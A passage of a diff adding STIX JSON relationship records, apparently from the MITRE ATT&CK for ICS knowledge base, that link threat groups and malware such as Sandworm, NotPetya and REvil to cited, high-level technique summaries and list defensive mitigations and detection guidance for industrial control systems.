2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--84e535be-960a-450a-91f9-4dc8c5e3f69d", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:56:37.468Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized HMI GUIs in the SCADA environment to open breakers. 
(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9f5096e-b9fc-459a-a303-88763b1269cc", + "type": "relationship", + "created": "2020-05-14T14:41:42.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "modified": "2020-05-15T19:15:35.568Z", + "description": "(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4dd93fd2-6e6d-4c50-a091-6d6ea6903f1e", + "created": "2022-09-28T21:21:58.641Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.435Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the HTTP CGI scripts on Omron PLCs to modify parameters on EtherCat connected servo drives.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dda89758-9d0b-446d-b594-85acc7f9cb90", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:40.524Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d65925e-f437-4557-bd8b-4c0d14ffd0b0", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:02:57.267Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:27:54.588Z", + "description": "All field controllers should require 
users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--042243fd-bfe0-4961-96de-a36232d3ff74", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec Security Response July 2014", + "description": "Symantec Security Response 2014, July 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Retrieved. 2016/04/08 ", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers#:~:text=The%20attackers%2C%20known%20to%20Symantec,supply%20in%20the%20affected%20countries." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:04:03.547Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) or [Trojan.Karagany](https://attack.mitre.org/software/S0094). 
(Citation: Symantec Security Response July 2014)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b5979643-fefb-460f-b59c-971efe95f121", + "created": "2022-09-27T16:57:48.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:28.408Z", + "description": "Monitor for changes made to services that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--47f15a06-8675-4698-833d-bd141ed9e755", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 
2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:18:32.118Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad7770c3-fe24-4285-9ce2-1616a1061472", + "type": "relationship", + "created": "2019-04-17T14:45:59.681Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). 
Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "modified": "2019-06-28T14:59:17.849Z", + "description": "(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--91f29477-2ff6-4dbf-bf68-c8825a938851", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.119Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3439d550-61d5-40b4-a514-341509d3f701", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:28.052Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked 
communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7fb3abd-c800-408e-8329-2a4f6256ea4a", + "created": "2022-09-29T14:27:05.757Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:27:05.757Z", + "description": "Monitor logon sessions for hardcoded credential use, when feasible.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b1d993d5-9e7e-4043-a651-07c7b5ad5a6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--de8b8a69-5f08-421a-96f0-2bed5707508d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nzyme Alerts Intro", + "description": "Koopmann, Lennart. (n.d.). Nzyme Alerts Introduction. Retrieved September 26, 2022.", + "url": "https://www.nzyme.org/docs/alerts/intro" + }, + { + "source_name": "Wireless Intrusion Detection", + "description": "Tomko, A.; Rieser, C; Buell, H.; Zeret, D.; Turner, W.. (2007, March). Wireless Intrusion Detection. Retrieved September 26, 2022.", + "url": "https://apps.dtic.mil/sti/pdfs/ADA466332.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:57:13.322Z", + "description": "New or irregular network traffic flows may indicate potentially unwanted devices or sessions on wireless networks. 
In Wi-Fi networks monitor for changes such as rogue access points or low signal strength, indicating a device is further away from the access point then expected and changes in the physical layer signal.(Citation: Nzyme Alerts Intro) (Citation: Wireless Intrusion Detection) Network traffic content will provide important context, such as hardware (e.g., MAC) addresses, user accounts, and types of messages sent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d3c94120-e6b5-4bd2-88f0-9c73f76b0104", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Ensure anti-virus solution can detect malicious files that allow user execution (e.g., Microsoft Office Macros, program installers).\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6603a100-d655-4e6b-8d38-73c11b89dde4", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS 
Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:58:42.847Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee1bf429-2c7c-4eb6-acca-e758522baf2e", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:07:33.947Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) utilizes JavaScript, WScript, and PowerShell scripts to execute. The malicious JavaScript attachment has an obfuscated PowerShell script that executes the malware. 
(Citation: Tom Fakterman August 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--63453d2f-30f6-40ab-b32c-506d940ecd20", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:25:01.756Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--067932c3-0011-4ca2-9bbe-721c631e4e41", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 
2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:04.571Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload gathers server information that includes CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. This information helps indicate the role the server has in the control process. (Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f40cc6f5-111c-418f-aa84-50d920fa6c48", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.118Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--78972893-5d8c-480f-a05d-481adc0c8bb0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:12:25.316Z", + "description": "Monitor ICS automation network protocols for functions related to reading an asset’s operating mode. In some cases, there may be multiple ways to detect a device’s operating mode, one of which is typically used in the operational environment. Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51ed2f2f-d7e2-4699-b6bf-8da9d0361d59", + "created": "2022-09-26T17:08:21.214Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:08:21.214Z", + "description": "Monitor device communication patterns to identify irregular bulk transfers of data between the embedded ICS asset and other nodes within the network. 
Note these indicators are dependent on the profile of normal operations and the capabilities of the industrial automation protocols involved (e.g., partial program uploads).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d66eae7-0dd4-4d21-ab07-8f7e350a7105", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:14:40.227Z", + "description": "Monitor executed commands and arguments to services specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. 
The adversary may then perform these actions using [Valid Accounts](https://attack.mitre.org/techniques/T0859).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--20a0d820-59ef-42fc-9f56-7a93d1ce7a84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.\n", + "source_ref": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ecf39e19-439f-4e9a-97c2-673ce4eb0a1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.139Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). 
Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 